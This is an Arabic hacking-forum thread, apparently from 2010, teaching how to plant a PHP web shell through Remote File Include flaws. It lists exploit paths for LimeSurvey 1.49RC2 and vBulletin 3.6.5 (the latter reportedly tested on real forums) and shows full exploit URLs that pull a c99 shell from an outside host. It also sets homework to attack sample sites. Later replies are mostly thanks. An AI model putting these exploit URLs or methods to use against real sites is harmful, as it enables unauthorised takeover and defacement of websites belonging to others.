التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام



العودة   :: vBspiders Professional Network :: > [ ::. الـقرصـنـة والأختراق ~ The Hidden World Of Hackers .:: ] > قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات
تحديث الصفحة كيفية رفع الشيل عبر ثغرات File Include
التعليمات التقويم مشاركات اليوم البحث

إضافة رد
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 06-11-2010, 04:47 AM   رقم المشاركة : 1 (permalink)
معلومات العضو
 
الصورة الرمزية R.B.G.ALORD
 

 
 
إحصائية العضو






R.B.G.ALORD غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
R.B.G.ALORD is on a distinguished road
.... كيفية رفع الشيل عبر ثغرات File Include

[align=center][/align][read]بسم الله الرحمن الرحيم[/read]

كيف الحال يا شباب عساكم بخير ان شاء الله

يا طويلين العمر عرفنا وش هو السيرفر وعرفنا وش هو الموقع

الحين واحد فيكم يسأل سؤال وجيه

حنا نبي موقع على السيرفر ليش تقول شيل عالسيرفر ؟؟

الجواب : لأن يمكن نقدر نرفع الشيل في مجلد الموقع المستهدف

اللي هو


كود:
/home/ksa/public_html

ويمكن ما نقدر عليه

لذلك نرفعه بأي منطقة ثانية على السيرفر اهم شي انه بنفس جهاز الكمبيوتر

كيييييييييييييييييف ؟؟؟

في عدة طرق انا راح اشرح اليوم طريقة

ام الطرق الثانية راح تكون في درس منفصل بإذن الله

الطريقة اللي راح اشرحها الحين وهي عن طريق [ الثغرات ]

يعني نرفع شيل من خلال ثغره

طبعاً الثغرات أنواع كثيره ولازم الواحد يتعمق فيها لكن دورتنا ما راح اشرح الثغرات كلها

راح اشرح اسهل نوع من انواع الثغرات ويأدي الغرض اللي نبيه ..

وهو ثغرات الـ File Include ( الفايل انكلود ) أو بالعربي ادراج ملف

يمكننا البحث عن الثغرات في مواقع الحماية وانا انصح بهذي المواقع

www.milw0rm.com
www.securityreason.com

لأن البحث عن الثغرات فيها بسيط وهي من اقوى المواقع في نفس الوقت

طبعاً انا راح اشرح كيف يتم استغلال ثغرات الفايل انكلود

نختار ثغرة من الميل ورم مثلاً

هذي الثغره

http://www.milw0rm.com/exploits/4156

تعالوا نطلع عليها

نشوف هالأشياء

فيها اسم المكتشف ووو .. لكن شوفوا هالخانات

كود:
## Script site : www.limesurvey.org
## Script name : LimeSurvey (PHPSurveyor)
## Version : 1.49RC2

Script site = موقع مبرمج السكريبت
Script name = اسم السكربت المصاب
Version = الاصدار المصاب

طيب واحد يقول لنا يا بو عابد وش هو السكريبت ؟

السكريبت هو برنامج مبرمج بلغة الـ php مثل سكربت المنتدى وسكربت البطاقات .. الخ

الحين الثغره اللي عرضتها فوق يقول لنا في سكريبت اسمه LimeSurvey فيه ثغرة فايل انكلود

يعني نقدر ندرج من خلالها شيل .. او بالأصح اي موقع مركب هالسكريبت نقدر نرفع فيه شيل

تعالوا نكمل نشوف الثغره

نشوف هالخانه

كود:
## Type : RFI(Remote File Include)

Type = النوع

مثل ماهوب ظاهر لنا ريموت فايل انكلود ( يعني ادراج ملف عن بعد )

واختصارها RFI وهي أول حرف من كلمة كلمة

المهم عرفنا انها فايل انكلود اتركوا كل الكلام لأنه ما يفيدنا

اهم شي في الثغره نعرفه

هو

1- اسم السكريبت المصاب . ( عرفنا في ثغرتنا انه اسم السكريبت المصاب هو LimeSurvey )
2- الاصدار المصاب . ( عرفنا في ثغرتنا فوق ان الاصدار المصاب هو 1.49RC2 )
3- نوع الثغره . ( عرفنا فوق ان الثغرات اللي حنا نشرح عليها فايل انكلود أي ثغرات ثانية استغلالها مختلف )
4- الاستغلال .

الحين عرفنا كل الأنواع أين الاستغلال

تعالوا نرجع لصفحة الثغره هنا

http://www.milw0rm.com/exploits/4156

ابحثوا عن عبارة Exploit وتعني ( الاستغلال )

انا لقيتها


كود:
## Exploit :

نلاحظ ان فيه اكثر من استغلال

وهذي هي الاستغلالات

كود:
## /admin/classes/pear/OLE/PPS/File.php?homedir=[shell]
## /admin/classes/pear/OLE/PPS/Root.php?homedir=[shell]
## /admin/classes/pear/Spreadsheet/Excel/Writer.php?homedir=[shell]
## /admin/classes/pear/OLE/PPS.php?homedir=[shell]
## /admin/classes/pear/Spreadsheet/Excel/Writer/Worksheet.php?homedir=[shell]
## /admin/classes/pear/Spreadsheet/Excel/Writer/Parser.php?homedir=[shell]
## /admin/classes/pear/Spreadsheet/Excel/Writer/Workbook.php?homedir=[shell]
## /admin/classes/pear/Spreadsheet/Excel/Writer/Format.php?homedir=[shell]
## /admin/classes/pear/Spreadsheet/Excel/Writer/BIFFwriter.php?homedir=[shell]
ناخذ استغلال من الاستغلالات
/admin/classes/pear/OLE/PPS/File.php?homedir=[shell]
تعالوا نحلل الاستغلال هذا
admin = مجلد
classes = مجلد آخر
pear = مجلد ثاني آخر
OLE = مجلد ثالث آخر
PPS = مجلد رابع آخر .. يا ليل البعارين
File.php = الملف المصاب

تعالوا نترجم الاستغلال

يقول لك الاستغلال ادخل مجلد admin داخله بتلقى مجلد classes ادخله وبتلقى داخله مجلد ثاني pear ادخله وداخله بتلقى مجلد ثالث OLE

ادخله وداخله بتلقى مجلد PPS داخل هالمجلد بتلقى ملف File.php وهو الملف المصاب

طيب ترجمنا الاستغلال ترى ما نحتاج الترجمه بس عشان تفهمون لا أكثر ولا أقل

لو جينا وقلنا هذا موقع

www.hack15.com

سكريبت LimeSurvey اصداره 1.49RC2 راكب عليه هنا

www.hack15.com/ls

وحنا عندنا ثغرة نرفع الشيل تعالوا نستغلها

بما ان السكريبت داخل مجلد ls في الموقع

راح يكون تطبيقنا كذا


كود:
http://www.hack15.com/ls/admin/class...e.php?homedir=[shell]
هذا هو الاستغلال
الحين كل اللي علينا نستبدل عبارة
[shell]
برابط شيل مرفوع على اي موقع بامتداد txt
لو انا مثلاً رافع شيل على موقع
بامتداد txt
كمثال شوف
http://younes.by.ru/c99.txt
هذا شيل c99 مرفوع على موقع
لاحظوا ان امتداده هو
txt
وليس
php
وهذا أمر مهم جداً لأننا نريد سحب الأكواد من المفكرة وترجمتها بالموقع المصاب
وليس قراءة الملف في الموقع اللي رافعين عليه الشيل
الاستغلال بيكون كذا

كود:
http://www.hack15.com/ls/admin/class...by.ru/c99.txt?
لاتنسوا عند الادراج تضعون علامة الاستفاهم في نهاية الاستغلال
تعالوا نترجم الأمر اللي سويناه
لو الحين فتحنا الصفحة هذي

كود:
http://www.hack15.com/ls/admin/class...by.ru/c99.txt?
بيعرض لنا الشيل اللي حنا رافعينه على موقع ثاني ولكن بينعرض على موقع بيت الهكرز
تعالوا نحلل الاستغلال ثاني
حنا الحين من خلال ثغرة في سكريبت مرفوع على موقع بيت الهكرز

أمرنا السكريبت بأن يقوم بإدراج أكواد هذي الصفحة
http://younes.by.ru/c99.txt
داخل بيت الهكرز
وقراءتها على سيرفر بيت الهكرز

يعني انه بيسحب أكواد الشيل ويشغله على بيت الهكرز

وبكذا بيعرض لنا الشيل على بيت الهكرز وحنا في الحقيقه ما رفعناه على الموقع كل اللي سويناه عرض على الموقع

ونقدر نتحكم بالموقع كامل من خلال هالطريقه .. وكذلك لو كان في مجلد مصرح 777 تقدر ترفع فيه الشيل على المواقع او صفحتك او اي شي

الحين نجي لدرسنا السابق وهو الصلاحيات الحين لو عرضنا الشيل على بيت الهكرز

وطلعت لنا الصلاحية = hack15 هذا يعني ان صلاحيتنا يوزر عالموقع يعني نقدر نتحكم في مجلد بيت الهكرز

يعني ما يحتاج تصريح 777 تقدر ترفع اندكسك بالصفحة الرئيسية وتلعب بالموقع كامل لعب لأن صلاحيتك حالياً هي يوزر يعني مالك الموقع

وبكذا نكون انتهينا من شرح استغلال ثغرات الفايل انكلود والحمد لله

قبل ما اطلع من الدرس حاب اعطيكم هدية بسيطه
===============================================
جاني واحد من الشباب وعطاني هالثغره
ثغرتين فايل انكلود تساعدك لرفع شل على نسخة ال 3.6.5 vb
الثغره مجربه علي اكثر من منتدي اجنبي



كود:
vb/includes/functions_cron.php?nextitem=shell

vb/includes/functions.php?classfile=shell

vb/includes/functions_forumdisplay.php?specialtemplates= shell
مثال على الاستغلال :-
http://www.hack15.com/vb/includes/fu...cialtemplates= shell
لا تنسى استبدال shell برابط شيل txt ولاتنسى علامة الاستفاهم واحلى اختراق
==================================================
تعالوا ما انتهينا يا حلوين .. هع مافي راحة

اسئلة اليوووم ^_^

حنا شرحنا فوق الثغره وانا شرحت استغلال واحد من الاستغلالات

الحين راع اعطي أمثلة مواقع ( وهمية )

هذي مواقع نفترض انها مركبة السكريبت والسكريبت فيها موجود بمجلد ss

هذي هي

www.soper.com/ss
www.ksa.com/ss
www.sos.com/ss
www.7looo.com/ss

ابيكم ترجعون تشوفون الاستغلالات فوق وتستغلونها على هذي المواقع

وكل استغلال مختلف عن الثاني يعني لا يجي واحد يطبق لي نفس الاستغلال غلى المواقع كلها

ويكون الاستغلال كامل مع الشيل وكل شي ..

مثال على استغلال كامل


كود:
http://www.hack15.com/ls/admin/class...by.ru/c99.txt?


R.B.G.ALORD_بتوفيق:a11:


;dtdm vtu hgadg ufv eyvhj File Include

التوقيع

[flash=http://up.7cc.com/upfiles/A6864760.swf]WIDTH=400 HEIGHT=350[/flash]
فلسطين

صاحبت صاحبي عشان اذا بموت يدفني لكن صاحبي صاحبني عشان اذا بموت يوخذ شبكة العناكب مني:a11: .... ان كان الزمان والمكان ضدي فا انا ابن فلسطين اعشق التحدي

 

   

رد مع اقتباس
قديم 06-11-2010, 05:24 AM   رقم المشاركة : 2 (permalink)
معلومات العضو
KaLa$nikoV
VBSPIDERS TEAM

#~VoLc4n0~#

 
الصورة الرمزية KaLa$nikoV
 

 
 
إحصائية العضو







KaLa$nikoV غير متواجد حالياً

إرسال رسالة عبر MSN إلى KaLa$nikoV

 

 

إحصائية الترشيح

عدد النقاط : 11
KaLa$nikoV is on a distinguished road
افتراضي

مشكور يا غالي


وبحب انبه الشباب بانه الثغره هاي خفت كثير

والسبب اصدار php 5 منع الاتصال الخارجي من السيرفر

وعمليه الانكلود هي اتصال خارجي وهيك هاي الثغره صارت نادره


لكن ما معنى هاد الكلام انها مش شغال او مش موجوده لازال تشتغل



مشكور يا غالي واقبل تعليقي :#

التوقيع



هل سأعود يوما
ام هي نهايه الطريق !!
إلهيْ ’ / أبدل عُسَرِنا يسُراً


لا تنسونا من دعائكم







سبحان الله والحمدلله ولا اله الا الله والله اكبر
fb.com/groups/VoLc4n0/
volc4n0@hotmail.com

 

   

رد مع اقتباس
قديم 06-11-2010, 05:25 AM   رقم المشاركة : 3 (permalink)
معلومات العضو
KaLa$nikoV
VBSPIDERS TEAM

#~VoLc4n0~#

 
الصورة الرمزية KaLa$nikoV
 

 
 
إحصائية العضو







KaLa$nikoV غير متواجد حالياً

إرسال رسالة عبر MSN إلى KaLa$nikoV

 

 

إحصائية الترشيح

عدد النقاط : 11
KaLa$nikoV is on a distinguished road
افتراضي

بارك الله فيك ياغلا


اقبل مروري

التوقيع



هل سأعود يوما
ام هي نهايه الطريق !!
إلهيْ ’ / أبدل عُسَرِنا يسُراً


لا تنسونا من دعائكم







سبحان الله والحمدلله ولا اله الا الله والله اكبر
fb.com/groups/VoLc4n0/
volc4n0@hotmail.com

 

   

رد مع اقتباس
قديم 06-11-2010, 09:39 AM   رقم المشاركة : 4 (permalink)
معلومات العضو
 
الصورة الرمزية abdolkadr
 

 
 
إحصائية العضو







abdolkadr غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
abdolkadr is on a distinguished road
افتراضي

جزاك الله خير ثغرة فايل انكلود ثغرة منقرضة من عصر الدينصورات

   

رد مع اقتباس
قديم 06-11-2010, 02:07 PM   رقم المشاركة : 5 (permalink)
معلومات العضو
 
الصورة الرمزية z3r0 b0mb3r
 

 
 
إحصائية العضو







z3r0 b0mb3r غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
z3r0 b0mb3r is on a distinguished road
افتراضي

مشكوررررررررررررررررررررررررررررر أخي
موضوع مميز
لك مني أجمل تحية

   

رد مع اقتباس
قديم 07-21-2010, 07:00 AM   رقم المشاركة : 6 (permalink)
معلومات العضو
 
الصورة الرمزية hack!n9
 

 
 
إحصائية العضو





hack!n9 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
hack!n9 is on a distinguished road
افتراضي

مشكوووووووووووور

   

رد مع اقتباس
قديم 08-02-2010, 08:08 PM   رقم المشاركة : 7 (permalink)
معلومات العضو
 
الصورة الرمزية lotfilosofi
 

 
 
إحصائية العضو





lotfilosofi غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
lotfilosofi is on a distinguished road
افتراضي

شكرا أخي موضوع رائع
تقبل تحياتي

   

رد مع اقتباس
قديم 08-21-2010, 02:02 AM   رقم المشاركة : 8 (permalink)
معلومات العضو
 
الصورة الرمزية عبد الله ر
 

 
 
إحصائية العضو







عبد الله ر غير متواجد حالياً

إرسال رسالة عبر MSN إلى عبد الله ر

 

 

إحصائية الترشيح

عدد النقاط : 10
عبد الله ر is on a distinguished road
افتراضي

يعطيك الف الف عافية

التوقيع

سبحان الله وبحمده سبحان الله العظيم
في الطريق الى الاحتراف
باذن الله
أن تكون سوريا" يعني أن تكون أسدا" تحيط به الضباع

 

   

رد مع اقتباس
قديم 08-21-2010, 07:05 PM   رقم المشاركة : 9 (permalink)
معلومات العضو
 
الصورة الرمزية jamel9919
 

 
 
إحصائية العضو





jamel9919 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
jamel9919 is on a distinguished road
افتراضي

شكرا اخي بارك الله فيك

   

رد مع اقتباس
قديم 08-26-2010, 07:37 PM   رقم المشاركة : 10 (permalink)
معلومات العضو
 
الصورة الرمزية DR.THMoORY
 

 
 
إحصائية العضو





DR.THMoORY غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
DR.THMoORY is on a distinguished road
افتراضي

مشكوور حبيبي
بش هي الحين نادريه بسبب تطوير إلى 5

   

رد مع اقتباس
قديم 09-07-2011, 09:05 AM   رقم المشاركة : 11 (permalink)
معلومات العضو
 
الصورة الرمزية حساس ولحد حاس
 

 
 
إحصائية العضو





حساس ولحد حاس غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
حساس ولحد حاس is on a distinguished road
افتراضي رد: كيفية رفع الشيل عبر ثغرات File Include

مششكور يالغالي

   

رد مع اقتباس
قديم 09-07-2011, 07:07 PM   رقم المشاركة : 12 (permalink)
معلومات العضو
 
الصورة الرمزية gastro
 

 
 
إحصائية العضو






gastro غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
gastro is on a distinguished road
افتراضي رد: كيفية رفع الشيل عبر ثغرات File Include

ty bro ^^

   

رد مع اقتباس
قديم 10-11-2011, 06:59 PM   رقم المشاركة : 13 (permalink)
معلومات العضو
 
الصورة الرمزية mustaphaovi
 

 
 
إحصائية العضو






mustaphaovi غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
mustaphaovi is on a distinguished road
افتراضي رد: كيفية رفع الشيل عبر ثغرات File Include

مشكوور يا اخي

   

رد مع اقتباس
قديم 08-11-2013, 05:28 AM   رقم المشاركة : 14 (permalink)
معلومات العضو
 
الصورة الرمزية فلكتور
 

 
 
إحصائية العضو






فلكتور غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 11
فلكتور is on a distinguished road
افتراضي رد: كيفية رفع الشيل عبر ثغرات File Include

شششرح رآئع جدإ َ،

   

رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)

« الموضوع السابق | الموضوع التالي »

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك
BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة
الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
الحصول على شل عن طريق ثغرات local file include المنتشره بكثره KaLa$nikoV قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات 54 02-23-2015 07:10 PM
الصلاحيات كيفية التعامل مع الشيل مراجعة المسارات R.B.G.ALORD قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات 3 08-21-2010 01:55 AM
حقن شيل فى ثغرات SQL Injection عن طريق Into Out File Dr.Alaa SQL قواعد البيانات 3 09-13-2009 07:11 AM


الساعة الآن 02:51 AM

:: vBspiders.Com :: RSS Feeds - راسلـنا - :: vBspiders.Com :: - الأعلى

[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0